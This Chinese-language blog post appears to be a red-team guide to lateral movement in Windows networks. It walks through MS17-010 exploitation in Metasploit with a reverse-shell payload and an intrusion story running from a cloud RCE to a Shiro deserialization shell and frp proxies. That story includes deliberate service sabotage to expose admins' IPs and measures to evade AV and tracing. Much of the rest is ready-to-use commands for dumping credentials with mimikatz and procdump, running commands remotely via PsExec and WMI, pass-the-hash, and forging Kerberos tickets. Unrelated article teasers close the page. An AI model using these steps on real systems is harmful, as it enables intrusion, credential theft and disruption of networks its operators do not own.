红队系列-内网横向

在这里插入图片描述

内网横向

  • 渗透测试-内网横向MS-17010利用方法总结
  • 原理介绍
  • 漏洞利用
    • MSF
    • Ladon
  • 渗透测试-从公有云到内网漫游RCE-反序列化-frp
      • 0x01 前言
      • 0x02 前期打点
      • 0x03 想办法打内网
      • 0x04对上面的IP进行渗透
      • 0x05 愉快的内网漫游
  • windows凭据窃取
    • Mimikatz
    • Procdump
    • Get-PassHashes.ps1
  • Windows远程连接和相关命令
    • IPC
      • 利用条件
      • 通过net来建立连接
      • windows常用命令(查看其他文章)
    • PsExec
    • SmbExec
    • WMI
      • wmiexec
      • wmiexec.py
      • wmiexec.vbs
      • Invoke-WMIMethod
    • PTH、PTT、PTK
      • PTH(Pass The Hash)
      • PTK(Pass The Key)
      • PTT(Pass The Ticket)
        • 黄金票据
        • 白银票据
  • 从外网打点到内网横向渗透,最终获取整个内网权限。
    • 渗透中级-漫游内网之横向移动
      • 横向移动 概述

渗透测试-内网横向MS-17010利用方法总结

原理介绍

永恒之蓝(ms17-010)过TCP端口445和139
来利用SMBv1 SMB 协议 即 SMBv1 全名: Server Message Block
和NBT中的远程代码执行漏洞,
恶意代码会扫描开放445文件共享端口的Windows机器,
无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt
在处理FEA(File Extended Attributes)转换时,
在大非分页池(内核的数据结构,Large Non-Paged Kernel Pool)上存在缓冲区溢出。

函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小。
然后会进行如下操作:
srv!SrvOs2FeaListSizeToNt会计算FEA list的大小并更新待转换的FEA list的大小
因为错误的使用WORD强制类型转换,导致计算出来的待转换的FEA list的大小比真正的FEA list大
因为原先的总大小计算错误,导致当FEA list被转化为NTFEA list时,会在非分页池导致缓冲区溢出

目前已知受影响的Windows 版本包括但不限于:
WindowsNT,2000、 XP、 2003、Vista、 7、 8,2008、2008 R2、2012 SP0。

漏洞利用

MSF

搜索ms17_010漏洞:search ms17_010
进入漏洞模块: use exploit/windows/smb/ms17_010_eternalblue
查看漏洞模块信息:info
设置攻击目标:set RHOSTS 172.16.7.180
查看可用的攻击payload:show payloads
选择并设置攻击Payload:set payload windows/x64/meterpreter/reverse_tcp
设置接收信息的本地设备:set LHOST 172.16.7.95 and port
最后检查下当前的配置:show options
开始攻击:exploit
直接拿到目标的Shell,然后任意命令执行
获取用户密码
load kiwi
进程迁移
creds_all
shell切换到控制机dos界面
创建新用户
提升至管理员权限
输入 net localgroup administrators查看管理员都有谁
开启 远程桌面控制

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

rdesktop x.x.x.x:3389

Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets

Ladon

http://k8gege.org/Ladon/cmddll.html

https://blog.csdn.net/k8gege/article/details/112253408

渗透测试-从公有云到内网漫游RCE-反序列化-frp

0x01 前言

当一个企业把他的业务放到腾讯云或阿里云等公有云的时候,其是与企业的内网是不相通的,
相当于逻辑隔离了(非物理隔离),
如果企业信息安全做的相对较好,不暴露VPN地址或者路由器或防火墙业务,
信息收集的时候,是很难进精准定位到企业的内网使用的公网地址的。

这个时候,想要入侵内网相对困难。
下面就介绍一下我从入侵公有云到渗透进内网进行漫游的实际渗透过程。

0x02 前期打点

怎样入侵拿下云服务器的不是本文重点,故不做详细介绍,只简单介绍思路。
根据公司名字,直接百度发现官网地址。根据官网地址进行了一波信息收集:
1、发现站点使用了CDN,是腾讯云主机,ip是变化的,无法探测真实IP
2、发现存在任意命令执行漏洞。直接RCE,拿下服务器权限。
先看下ip地址

在这里插入图片描述
发现显示的是内网地址,这个时候,查看下真实的ip,虽然这个对接下来的内网渗透没什么diao用。

在这里插入图片描述
到此才发现是腾讯云,主机不在内网。

0x03 想办法打内网

这个时候,我就要办法获取公司办公网的外网IP了,
这个外网ip要么是防火墙的,要么是路由器的。怎么获取呢?
我想到了一个办法,一般云主机,
运维人员会通过ssh来进行管理,一般在上班时间,他们会连接进来,这个时候,就会获取到公司的真实公网IP。

教大家一个小技巧,如果是小公司,运维可能十天半个月都不会连上来,
这个时候,我们就可以搞点“小破坏”,逼迫运维上线。

比如关闭它的web服务等等,大家千万注意两点:

1.动作不要太大,免得被运维发现被黑,当然你可以提前做权限维持,这里不做介绍。
2. 没有“授权”,千万不要乱搞;没有授权,千万不要乱搞;没有授权,千万不要乱搞,
3. 否则就会进局子吃免费的饭了,咋不能干违法的事,哈哈。

我们看看运维上线没:
[root@VM-0-13-centos~]# netstat -lantp | grep ESTABLISHED
在这里插入图片描述
我们重点关注sshd进程,这个前面的公网IP就的运维所在公司的公网IP。
我这里发现了两个。。。

0x04对上面的IP进行渗透

同样繁琐的事情来一波,信息收集。。。
发现了shiro发序列化漏洞,直接反弹shell了
在这里插入图片描述
直接进来了:

在这里插入图片描述
看一下内网地址:内网地址是10.10.10.187
在这里插入图片描述
看看目标机器能否访问外网:
在这里插入图片描述
最理想的状态,可以访问外网,接下来就可以开始代理进内网进行渗透了。

0x05 愉快的内网漫游

frp+Proxifier代理搞起来,这里怎样搭建就不详细介绍了,可以自行谷歌。
很简单,最好是socks5代理,并加密,躲一下AV的流量检测;
也最好增加代理的密码,防止“别人”使用。
我这里使用了修改版的frp,利用远程加载配置文件的方式,稍微躲避一下,增加一点点溯源的难度:

在这里插入图片描述
代理搭建完,接下来扫一下内网看看:
在这里插入图片描述
有经典的MS17-010漏洞,其实还发现了很多其他的漏洞。
就拿最好利用的MS17-010快速开始吧,而且是windows服务器,利用价值大,且拿下后,
用服务器再做一层代理,连RDP可以快速结束战斗,一把梭。

我的msf是公网,利用proxychains代理一下,直接。
开始:
在这里插入图片描述
成功(这张图是后来补的,信息可能不一致,但原理一样)

看下权限是system最高权限,省去提权了。
在这里插入图片描述
利用mimikatz来抓取密码:
在这里插入图片描述
获取到了管理员的密码

发现开了3389直接登录

在这里插入图片描述
发现了这个,虚拟机备份,这个可以使用本地认证,有搞头。。。
发现了群辉NAS
发现了3台Vcenter
在这里插入图片描述
虚拟机超多呀,粗略看了一下,几百台。。。。全部可以接管了
在这里插入图片描述

感谢 黑猫老哥 提供 文章 【再次感谢 】

  • 以被攻陷的主机作为跳板,来访问域内其他主机.通过此类攻击手段,最终可能会获得域控制器(DC)的访问权限及重要数据.

windows凭据窃取

Windows的系统密码hash一般由两部分组成:
LM-Hash和NTLM-Hash hash
格式为username:RID:LM-Hash:NTLM-Hash

Mimikatz

Mimikatz 下载地址:https://github.com/gentilkiwi/mimikatz

Mimikatz可以从lsass.exe 进程里获取windows处于active状态账号的明文密码。

privilege::debug        //提升权限
sekurlsa::logonpasswords        //抓取密码  full

在这里插入图片描述
导出SAM表,通过mimikatz来提取

reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

lsadump::sam /sam:SAM /system:SYSTEM

在这里插入图片描述

Procdump

下载地址:https://docs.microsoft.com/zhcn/sysinternals/downloads/procdump

Procdump是微软官方发布的一款调试工具,
可通过Procdump转储内存文件到本地再通过mimikatz来抓取文件中hash,
可躲避杀软查杀 使用Procdump将lsass.exe转储成dmp文件

procdump64.exe -accepteula -ma lsass.exe lsass

在这里插入图片描述
使用mimikatz从转储的lsass.dmp中读取明文密码


mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

在这里插入图片描述

Get-PassHashes.ps1

下载地址:https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1

Get-PassHashes.ps1是nishang中的一个脚本,可用于导出hash

Import-Module .\Get-PassHashes.ps1
Get-PassHashes

在这里插入图片描述

Windows远程连接和相关命令

IPC

IPC(Internet Process Connection)共享命名管道的资源,
是为了时间进程间通信而开放的命名管道,通过提供用户名密码建立一条安全的、加密的、用于数据交换的通道.
通过这个连接,可以在目标机器上执行命令,文件上传/下载等.
在同一时间内,
两个ip之间允许建立一个连接.

利用条件

  • 目标机器开放129、445端口
  • 目标机器管理员开启了ipc$默认共享
  • 知道目标机器账号密码

通过net来建立连接

net use \\[DC-IP]\ipc$ ["password"] /user:[username]
net use \\192.168.10.1\ipc$ "Admin@123" /user:administrator

在这里插入图片描述
net use查看连接

在这里插入图片描述
通过建立的IPC连接,可便于win7访问2008的文件,进行上传、下载等操作。

IPC连接还可进行本地映射,将DC的C盘映射到本地Z盘

net use z: \\[IP]\c$ [password] /user:[username]
net use z: \\192.168.10.1\c$ "Admin@123" /user:administrator

在这里插入图片描述
在这里插入图片描述
删除IPC连接

net use \\[IP] /del /y
net use \\192.168.10.1 /del /y

在这里插入图片描述

windows常用命令(查看其他文章)

PsExec

下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

PsExec是一种轻量级telnet-replacement,
可用于在其他系统上执行进程,为控制台应用提供完全交互性,而无需手动安全客户端软件。
PsExec需要目标机器开启admin$共享(默认是开启的),
如果目标机器开启防火墙,那么PsExec将无法使用.
PsExec基本原理:

通过ipc$连接,释放二进制文件psexecsvc.exe到目标机器
动过服务管理SCManager远程创建一个psexec服务,并启动服务
客户端连接执行命令,服务端通过服务启动相应的程序执行命令并返回数据
运行结束后删除服务

在建立ipc$的情况加可直接进行连接

PsExec.exe -accepteula \\192.168.10.1 -s cmd.exe
-accepteula:第一次运行psexec时会弹窗,使用该参数不会弹框
-s:以system权限运行,不使用此参数测试administrator权限

在这里插入图片描述
没有建立ipc$连接可通过-u,-p两个参数来指定用户名密码

PsExec.exe \\192.168.10.1 -u administrator -i -p Admin@123 cmd.exe

在这里插入图片描述

Metasploit中也有psexec模块

exploit/windows/smb/psexec
exploit/windows/smb/psexec_psh(powershell版本)

SmbExec

下载地址:https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.pysmbexec

smbexec是一款基于pexec的与渗透测试工具,
并配套samba工具,可以通过文件共享

在远程系统中执行命令

smbexec.py [username]:[password]@[IP]

WMI

WMI(Windows Management Instrumentation,135端口)
是Windows自带功能,WMI以本地和远程方式提供了许多管理功能,
包括查询系统信息、启动和停止进程以及设置条件触发器,
而且整个运行过程都在计算机内存中发生,具有极高的隐蔽性。

使用wmic远程执行命令,
需要在目标机器开启WMI服务(需要开放135端口,wmic会以管理员权限在远程系统中执行命令)

查看目标机器进程信息

wmic /node:[IP] /user:[username] /password:[password] process list brief
wmic /node:192.168.10.1 /user:administrator /password:Admin@123 process list brief

在这里插入图片描述
使用cmd执行命令(没有回显需要通过ipc$和type来进行读取)

wmic /node:192.168.10.1 /user:administrator /password:Admin@123 process call create "cmd.exe /c whoami > whoami.txt"

在这里插入图片描述

wmiexec

对windows自带的wmic做了一些改进,可通过用户名密码或者配合哈希传递等一起使用

wmiexec.py

该脚本是impacket工具包中的一个工具.

下载地址:https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py

python wmiexec.py [username]:[password]@IP
python wmiexec.py -hashes [LM Hash]:[NT Hash] [username]@[IP]

wmiexec.vbs

通过vbs脚本来调用WMI来模拟PsExec功能.

cscript.exe //nologo wmiexec.vbs /shell [IP] [username] [password]

Invoke-WMIMethod

Invoke-WMIMethod是powershell自带的模块

#目标系统用户名
$User = "DC-2008\administrator"

#目标系统密码
$Password= ConvertTo-SecureString -String "Admin@123" -AsPlainText -Force

#账号密码整合,导入Credential
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User , $Password

#远程运行计算器程序
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName "192.168.10.1" -Credential $Cred

PTH、PTT、PTK

Pass The Hash (PTH,hash传递攻击)
Pass The Ticket(PTT,票据传递攻击)
Pass The Key(PTK,密钥传递攻击)

当使用PTH的时候当目标机器存在KB2871997补丁后,
PTH配合Mimikatz只能连接域用户,不能连接其他组的用户。

PTK需要目标机器存在KB2871997补丁才可以连接域用户,
也可以连接组,采用ase256连接,
PTH与PTK都是基于NTML认证,而PTT是基于kerbros协议。

在这里插入图片描述

PTH(Pass The Hash)

PTH在内网中是一种经典的攻击方式,
可直接通过LM Hash(已弃用)和NTLM Hash访问远程主机或服务。

在打补丁后,常规的PTH已无法成功,唯独SID为500的用户除外,
利用这个用户仍可以通过PTH来远程ipc连接

如果禁用了NTLM认证,PsExec无法利用获得的NTLM Hash进行远程连接,
可通过Mimikatz来进行连接

在得到NTLM Hash后通过Mimikatz进行hash传递

sekurlsa::pth /user:[username] /domain:[domain] /ntlm:[NTLM Hash]


sekurlsa::pth /user:administrator /domain:dc.2008.com /ntlm:70be8675cd511daa9be4b8f49e829327  //连接域用户

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:70be8675cd511daa9be4b8f49e829327		连接本地用户

在这里插入图片描述

PTK(Pass The Key)

PTK需要一个前提条件,目标主机必须打KB2871997补丁,因此用的很少

sekurlsa::ekeys     //获得aes256值
sekurlsa::pth /user:administrator /domain:dc.2008.com /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

PTT(Pass The Ticket)

PTT是基于kerberos协议进行攻击,最常见的攻击方式:黄金票据、白银票据

黄金票据
mimikatz.exe "kerberos::golden /user:[用户名] /domain:[域名] /sid:[域SID] /krbtgt:[krbtgt NTLM Hash] /ticket:Administrator.kiribi"
白银票据
mimikatz.exe "kerberos::golden /domain:<域名> /sid:<域SID> /target:[目标主机名] /service:<服务类型> /rc4:[KRBTGT NTLM Hash] /user:[任意用户名] /ptt"

参考
https://www.freebuf.com/articles/network/251364.html
https://xz.aliyun.com/t/9744#toc-3
https://www.freebuf.com/articles/system/229200.html
http://www.kxsy.work/2022/02/14/nei-wang-shen-tou-zui-shi-yong-de-heng-xiang-yi-dong-zong-jie/#toc-heading-5
https://www.cnblogs.com/bmjoker/p/10355979.html

从外网打点到内网横向渗透,最终获取整个内网权限。

三层代理内网穿透,会学习到各种内网穿透技术
cobalt strike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点进入内网。

渗透中级-漫游内网之横向移动

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

横向移动 概述

在这里插入图片描述
获取 域控制权限

在这里插入图片描述
第三方 加载 wmi payload

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
主机名 \账户名
在这里插入图片描述
在这里插入图片描述
指定域用户 域名\用户 域名@用户

  • 最后 要 用 斜杠 转义
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    wmi 绕过 AV 创建进程

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
shell 目标地址 + 凭据

在这里插入图片描述
wmi hash套件
查看域内 那些主机 可以用 你的凭据 登录
在这里插入图片描述
用百分号 分割
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
构造 system 权限 的 service
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
dump 下 哈希 和明文密码
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
票据
在这里插入图片描述
事件 溯源

在这里插入图片描述
smb tcp 派生
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
绕过 远程 UAC 执行操作
在这里插入图片描述
票据传递

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
哈希 操作 win10之后 绕过证书
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/229870.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Python开发运维:Python常见异常类型

目录 一、理论 1.异常 一、理论 1.异常 &#xff08;1&#xff09;概念 异常是程序因为某种原因无法正常工作了&#xff0c;比如缩进错误、缺少软件包、环境 错误、连接超时等都会引发异常。 一个健壮的程序应该把所能预知的异常都应做相应的处理&#xff0c;保障程序长期运…

Linux文件系统与基础IO

文章目录 1 C文件接口1.1 fopen1.2 fwrite、fread、rewind、fclose 2 文件系统调用2.1 open2.1.1 参数2&#xff1a;flags2.1.2 参数3&#xff1a;mode2.1.3 返回值——file descriptor 2.2 write2.3 read2.4 close 3 文件的本质3.1 struct file3.2 一个进程如何与多个文件相关…

luceda ipkiss教程 43:画渐变圆弧型波导

案例分享&#xff1a; from si_fab import all as pdk import ipkiss3.all as i3 from ipcore.properties.restrictions import RestrictTuple from ipkiss.geometry.shapes.modifiers import __ShapePathBase__ import numpy as np from math import atan2class ShapePathTa…

电子学会C/C++编程等级考试2021年06月(五级)真题解析

C/C++等级考试(1~8级)全部真题・点这里 第1题:数字变换 给定一个包含5个数字(0-9)的字符串,例如 “02943”,请将“12345”变换到它。 你可以采取3种操作进行变换 1. 交换相邻的两个数字 2. 将一个数字加1。如果加1后大于9,则变为0 3. 将一个数字加倍。如果加倍后大于…

2023-12-08 LeetCode每日一题(出租车的最大盈利)

2023-12-08每日一题 一、题目编号 2008. 出租车的最大盈利二、题目链接 点击跳转到题目位置 三、题目描述 你驾驶出租车行驶在一条有 n 个地点的路上。这 n 个地点从近到远编号为 1 到 n &#xff0c;你想要从 1 开到 n &#xff0c;通过接乘客订单盈利。你只能沿着编号递…

CSS import 规则

导入 “navigation.css” 样式到当前的样式表&#xff1a; import “navigation.css”; /* 使用字符串 / 或者 import url(“navigation.css”); / 使用 url 地址 */ 属性定义及使用说明 CSS import 用于从其他样式表导入样式规则。 import 规则必须在 CSS 文档的头部&#xff…

[HITCON 2017]SSRFme perl语言的 GET open file 造成rce

这里记录学习一下 perl的open缺陷 这里首先本地测试一下 发现这里使用open打开 的时候 如果通过管道符 就会实现命令执行 然后这里注意的是 perl 中的get 调用了 open的参数 所以其实我们可以通过管道符实现命令执行 然后这里如果file可控那么就继续可以实现命令执行 这里就…

计算机基础知识67--BBS

迁移表格 # 以后你写的每个python项目&#xff0c;都必须有一个txt文件叫 requirements.txt,里面放了当前项目所有的依赖&#xff0c;别人拿到项目---》需要执行 pip install -r requirements.txt # 装好该项目所有依赖 django3.2.20 # 模块 pillow mysqlclient # 主体项目功…

第一课【习题】使用DevEco Studio高效开发

用哪一种装饰器修饰的组件可作为页面入口组件 ArkTS Stage模型支持API Version 9&#xff0c;关于其工程目录结构说法正确的是&#xff1f; 4. DevEco Studio提供模拟器供开发者运行和调试HarmonyOS应用/服务&#xff0c;以下说法错误的是&#xff1f; DevEco Studio支持使…

执行npm run dev报Error: error:0308010C:digital envelope routines::unsupported问题

vue2element-ui项目&#xff0c;在执行npm run dev的时候突然报错&#xff1a; (node:19424) [DEP0111] DeprecationWarning: Access to process.binding(http_parser) is deprecated. (Use node --trace-deprecation ... to show where the warning was created) Er…

尝试通过AI模型进行简单的编码

一、前言 最近尝试通过AI来编程&#xff0c;总体感觉还是能处理写简单的问题&#xff0c;复杂的问题目前还是无法解决。主要的痛点还是数据噪音&#xff0c;就是AI永远不会承认它不会&#xff0c;它会给你的一个错误的信息&#xff0c;它也不会告诉你你的问题它暂时无法完整正…

多段图问题-动态规划解法

一、多段图问题 问题描述&#xff1a;设图G(V, E)是一个带权有向图&#xff0c;如果把顶点集合V划分成k个互不相交的子集Vi (2≤k≤n, 1≤i≤k)&#xff0c;使得对于E中的任何一条边(u, v)&#xff0c;必有u∈Vi&#xff0c;v∈Vim (1≤i≤k, 1&#xff1c;im≤k)&#xff0c;…

【带头学C++】----- 九、类和对象 ---- 9.4 拷贝构造函数、赋值

目录 9.4 拷贝构造函数、赋值 9.4.1 定义拷贝构造函数 9.4.2 拷贝构造和无参构造、有参构造的关系 9.4.3 拷贝构造的几种调用形式 1、旧对象给新对象初始化&#xff0c;调用拷贝构造 2、给对象取别名不会调用拷贝构造 3、普通对象作为函数参数&#xff0c;调用函数时会发…

【Java用法】Hutool树结构工具-TreeUtil快速构建树形结构的两种方式 + 数据排序

Hutool树结构工具-TreeUtil快速构建树形结构的两种方式 数据排序 一、业务场景二、Hutool官网树结构工具2.1 介绍2.2 使用2.2.1 定义结构2.2.2 构建Tree2.2.3 自定义字段名 2.3 说明 三、具体的使用场景3.1 实现的效果3.2 业务代码3.3 实现自定义字段的排序 四、踩过的坑4.1 坑…

中伟视界:皮带跑偏、异物检测AI算法除了矿山行业应用,还能在钢铁、火电、港口等行业中使用吗?

随着工业化的发展&#xff0c;皮带输送机已经成为各行业中不可或缺的重要设备&#xff0c;但是在使用过程中&#xff0c;由于各种原因&#xff0c;皮带常常出现跑偏问题&#xff0c;给生产运营带来了诸多困扰。不仅仅是矿山行业&#xff0c;钢铁、火电、港口等行业也都面临着皮…

英文论文查重复率网址

大家好&#xff0c;今天来聊聊英文论文查重复率网址&#xff0c;希望能给大家提供一点参考。 以下是针对论文重复率高的情况&#xff0c;提供一些修改建议和技巧&#xff1a; 英文论文查重复率网址 在撰写英文论文时&#xff0c;查重是确保论文原创性和质量的重要环节快码论文…

LeetCode Hot100 131.分割回文串

题目&#xff1a; 给你一个字符串 s&#xff0c;请你将 s 分割成一些子串&#xff0c;使每个子串都是 回文串 。返回 s 所有可能的分割方案。 回文串 是正着读和反着读都一样的字符串。 方法&#xff1a;灵神-子集型回溯 假设每对相邻字符之间有个逗号&#xff0c;那么就看…

windows11 windows 11 (win11 win 11) 怎么安装 Python3 ? numpy? sounddevice? 声音信号处理库?

首先确认要安装的 sounddevice 库&#xff0c;链接&#xff1a;https://python-sounddevice.readthedocs.io/en/0.4.6/ 根据文档&#xff0c;可知最新的 sounddevice 版本是 0.4.6 进入安装页面查看&#xff0c;发现 Newest sounddevice 可以使用 pip 安装&#xff0c;如下图…

AGM离线下载器使用说明

AGM专用离线下载器示意图&#xff1a; 供电方式&#xff1a; 通过 USB 接口给下载器供电&#xff0c;跳线 JP 断开。如果客户 PCB 的 JTAG 口不能提供 3.3V 电源&#xff0c;或仅需烧写下载器&#xff0c;尚未连接用户 PCB 时&#xff0c;采用此种方式供电。 或者&#xff1a…

私域运营:12个朋友圈经营模板

做私域运营的各位&#xff0c;想必大家都会烦恼朋友圈要发什么才能保证最高效吧&#xff01; 首先&#xff0c;我们需要明确&#xff0c;朋友圈是什么&#xff1f; 朋友圈是我们打造信任感的地方&#xff0c;也是我们的信息能够及时触达用户的重要渠道。很多人都有一个习惯&a…